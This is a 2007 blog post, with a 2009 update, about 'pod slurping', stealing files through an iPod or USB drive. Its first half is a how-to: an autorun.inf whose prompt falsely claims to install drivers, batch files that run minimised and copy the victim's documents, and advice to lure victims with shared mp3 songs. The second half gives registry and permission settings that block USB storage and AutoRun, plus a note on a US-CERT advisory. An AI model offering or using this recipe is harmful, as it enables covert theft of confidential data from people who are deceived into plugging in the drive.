Friday, December 21, 2007

iPod can be "malicious"...

Many of you may know about Pod Slurping. For the benefit of those who don't, Pod Slurping is the act of using a portable data storage device such as iPod to illicitly download confidential data by directly plugging it into a computer where the data is held.

We are talking about using a iPod or USB flashdrive, which will automatically copy files and data when it is connected into the USB port of the victim's system. It is the easiest way to "steal" information from a "innocent" victim without their knowledge.

Very often, you will see people sharing mp3 songs and document files by passing their iPod or USB drive. You can easily put a pod slurping script into your USB drive and trick the victim (with some mp3 songs) to plug it into his/her system.

How to pod slurping
1)To perform pod slurping, write a simple autorun setup file as below:
autorun.inf -
>open begin.bat
>action=Click "OK" to install USB flash drive drivers

2)As seen in the autorun file, write a batch file "begin.bat" that minimise and run the actual batch file that will copy all the "targeted" data.
begin.bat -
>@echo off
>@start /min slurp.bat /B

3)Another batch file "slurp.bat" will be the actual batch file that will be copying all the data into your USB drive. Write whatever Dos commands you like to "steal" the victims data such as:
> xcopy *.doc

How to protect against pod slurping
There are a few ways to protect against Pod Slurping. You can either (1)disable the USB storage device or (2) disable USB autorun.
1) To disable the use of USB storage device, If a USB storage device is not already installed on the computer, Set Deny permissions to the user or the group on the following files:
> %SystemRoot%\Inf\Usbstor.pnf
> %SystemRoot%\Inf\Usbstor.inf
If a USB Storage Device Is Already Installed on the Computer, set the registry "Start" value in the registry path "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor" to 4.

For the detail steps, refer to Microsoft Technet (

2) To disable the USB autorun, set the registry "NoDriveTypeAutoRun" DWORD value in the registry path "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" to ff(255).

For the details, refer to Microsoft MSDN (

So the next time after sharing files from an USB storage, make sure nothing "sensitive" are "secretly" copied out from your system.

Updated on 26 February 2009 -
The US Cert released an announcement on 20th Jan 09, stating that "Microsoft Windows does not disable AutoRun properly". In the announcement, they claims that "Disabling AutoRun on Microsoft Windows systems can help prevent the spread of malicious code. However, Microsoft's guidelines for disabling AutoRun are not fully effective, which could be considered a vulnerability." Viruses, such as the Conficker worm, are using AutoRun to spread.

Microsoft released a support knowledgebase, "Article ID: 967715 - How to correct "disable Autorun registry key" enforcement in Windows", on 24 Feb 09 to provide detail steps in disabling AutoRun in Windows. They also released a security advisory, Update for Windows Autorun (KB967940), with a patch to correct the functionality feature of AutoRun.

No comments: